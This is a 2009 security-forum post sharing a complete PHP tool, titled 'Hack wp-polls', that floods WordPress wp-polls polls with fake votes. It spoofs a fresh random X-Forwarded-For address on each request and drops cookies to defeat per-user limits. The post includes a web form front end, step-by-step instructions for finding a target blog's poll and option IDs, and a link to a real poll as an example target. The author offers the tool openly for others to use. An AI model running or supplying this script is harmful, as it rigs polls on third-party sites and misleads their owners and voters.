Critical Security.NET: Wordpress `wp_Polls` Post Data - Critical Security.NET

Jump to content

Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

Wordpress `wp_Polls` Post Data

#1 User is offline   Dr Small Icon

  • Addicted
  • PipPipPipPipPip
  • Group: Members
  • Posts: 235
  • Joined: 21-February 06
  • Gender:Male
  • Location:benkoda

Posted 20 November 2009 - 11:56 PM

This is a function I've been writing, to basically brute-force my votes onto a Wordpress `wp_polls` poll. wp_polls is a plugin for Wordpress, and the admin makes a poll with options, and can set restrictions on how many times a unique user can vote. I followed the theory and the clock work behind it, and see that it is only blocking you by IP Address (which, I will explain in a second), and cookies.

Apparently, for some unknown reason, Wordpress checks the X-Forwarded-For header, before it does the REMOTE_ADDR. With this in mind, we can write a script to send a uniquely spoofed X-Forwarded-For header, along with our POST data to the script, of which poll is being voted on (poll_id) and which option is being selected (poll_(poll_id)).

I basically dissected the HTML form data to determine what data had to be sent via POST, and collect the cookies, but don't use them again. I think the function turned out rather well... you can check it out and use it if you like. Basically, I can enter all of the poll_id's and which option is being voted on, and specify how many times I want the function to vote on a given option (while loop).

<?php
/**
 * Copyright 2009; Dr Small
 *
 * A simple way to increase a specific number of votes on
 * a wp-polls poll. It sets a new IP in the X-Forwarded-For
 * header, every time it executes, dumps cookies to /tmp and
 * doesn't read them the next time around.
 *
 * Howto use:
 *	a) Find a Wordpress blog that uses a wp-polls poll
 *	b) Use the URL as http://domain.tld/wp-content/plugins/wp-polls/wp-polls.php
 *	c) View the page source, and find `name="poll_id" value="52"`
 *	d) Use the value as your poll_id
 *	e) Find the value of the specific poll option you want to vote on (i.e, name="poll_52" value="548")
 *	f) Specify how many votes go toward that option (with votes)
 *
 * This same kind of method could be used on almost any kind of poll
 * that does not use "user registration & activation" to vote.
 **/

/**
 * name:	Hack wp-polls
 * @param:	url		string		The URL to the plugins/wp-polls/wp-polls.php file
 * @param:	poll_id		int		The Poll ID
 * @param:	poll_value	int		The option being voted on
 * @param:	vote		int		How many times to vote on a given poll (default: 5)
 * @param:	verbose		string		How verbose to be (default: true)
 * @description:				A proof of concept way to hack wp-polls.
 **/
function hack_wp_polls($url, $poll_id, $poll_value, $vote=5, $verbose="false"){

	// Generate a 4 octive random IP address
	function makeUniqueIP(){
		srand((double)microtime()*1000000); 
		$ip = rand(1,255).".".rand(0,255).".".rand(0,255).".".rand(1,255); 
		return $ip;
	}
	
	$i = 1;
	while ($i <= $vote){
		$v .= "starting loop....<br />";
		
		// Generate a unique value
		$ip = makeUniqueIP();
		$v .= "makeUniqueIP() returned $ip<br />";

		// create a new cURL resource
		$ch = curl_init();
		$v .= "opening curl resource....<br />";

		// wp-polls may be checking the IP Address of the
		// user, to make sure he doesn't send data twice;
		// send a unique IP each time (Wordpress checks X-Forwarded-For)
		$headerarray = array(
			"X-Forwarded-For: $ip");
	
		// The POST data to be sent
		$postfields = "vote=+++Vote+++&poll_id=$poll_id&poll_$poll_id=$poll_value";
		
		// set URL and other appropriate options
		curl_setopt($ch, CURLOPT_URL, $url);
		$v .= "setting CURLOPT_URL to $url<br />";
		
		curl_setopt($ch, CURLOPT_HEADER, 0);
		curl_setopt($ch, CURLOPT_USERAGENT, "cURL bot");
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_HTTPHEADER, $headerarray);
		curl_setopt($ch, CURLOPT_POST, true);
		$v .= "setting CURLOPT_POST to true<br />";
		
		curl_setopt($ch, CURLOPT_POSTFIELDS, $postfields);
		$v .= "setting CURLOPT_POSTFIELDS to $postfields<br />";
		
		curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookiefile.txt');
		$v .= "setting CURLOPT_COOKIEJAR to /tmp/cookiefile.txt<br />";

		curl_exec($ch);
		$v .= "executing curl...<br />";

		// close cURL resource, and free up system resources
		curl_close($ch);
		$v .= "closing curl resource....<br /><br /><br />";
				
		// Be verbose, if requested.
		if ($verbose == "true"){
			echo $v;
			$v = '';
		}
		$i++;
	}
}

if ($_POST[url] && $_POST[poll_id] && $_POST[option] && $_POST[verbose]){
	hack_wp_polls($_POST[url], $_POST[poll_id], $_POST[option], $_POST[votes], $_POST[verbose]);
} else {

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
	<head>
		<title>hAcK wP-p0lLz</title>
	</head>
	<body>
		<h1>hAcK wP-p0lLz</h1>
		<form action="<?php echo $_SERVER[PHP_SELF];?>" method="post">
		<table>
			<tbody>
				<tr>
					<td>URL:</td>
					<td>poll_id:</td>
					<td>option:</td>
					<td>votes:</td>
					<td>verbose:</td>
				</tr>
				<tr>
					<td><input type="text" name="url" value="" /></td>
					<td><input type="text" name="poll_id" value="" size="3"/></td>
					<td><input type="text" name="option" value="" size="3"/></td>
					<td><input type="text" name="votes" value="" size="3"/></td>
					<td><select name="verbose">
						<option value="true" selected="selected">true</option>
						<option value="false">false</option>
					</select></td>
						
				</tr>
			</tbody>
		</table>
		<input type="submit" value="Vote" />
		</form>
	</body>
</html>
<?php } ?>


An example poll can be found here, which uses the wp_polls plugin for Wordpress:
http://hsbapost.com/...-guy-blog-2009/


Dr Small
0
Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users